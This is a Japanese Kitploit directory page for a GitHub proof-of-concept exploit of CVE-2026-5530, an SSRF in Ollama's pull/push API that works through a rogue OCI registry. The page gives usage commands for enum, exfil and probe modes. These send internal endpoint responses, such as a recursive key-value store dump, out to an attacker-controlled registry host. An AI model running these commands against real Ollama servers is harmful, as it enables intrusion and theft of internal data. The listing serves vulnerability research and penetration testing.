Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/davidrxchester/cve-2026-5530
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出情報収集
GitHubdavidrxchester/cve-2026-5530

CVE-2026-5530

CVE-2026-5530の概念実証エクスプロイト。OllamaのPull/Push APIにおけるSSRFであり、悪意のあるOCIレジストリを介した内部エンドポイントの列挙と完全なレスポンスの外部送信を可能にします。

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-5530

OCIレジストリリダイレクトを介したOllama SSRF、完全なレスポンス外部送信を伴う。

Writeup: https://davidrochester.com/posts/cve-2026-5530

開示

Ollamaに複数回連絡したが、応答はなかった。

使用方法

enum、exfil、probeの3つのモードがある。

Enum

Ollamaホストから到達可能な内部エンドポイントを検出する。

root@kitploit:~
python3 poc.py targets.txt --registry-host <your-ip>

Exfil

レスポンスサイズが分かっている場合に、SSRFレスポンスを外部送信する。

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>

Probe

レスポンスサイズを自動的に二分探索し、その後外部送信する。

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>

オプション

root@kitploit:~
target              URLまたはURLのファイル(1行に1つ、#はコメント)
-p, --port          不正レジストリのポート(デフォルト: 9999)
--exfil-port        外部送信レジストリのポート(デフォルト: 10000)
--exfil             外部送信モード、--sizeが必要
--probe             サイズを二分探索し、その後外部送信
--size              Content-Length(--exfilと併用時に必須)
--registry-host     Ollamaが到達可能な攻撃者のIP/ホスト名
--ollama            Ollama API URL(デフォルト: http://127.0.0.1:11434)
ツールをダウンロード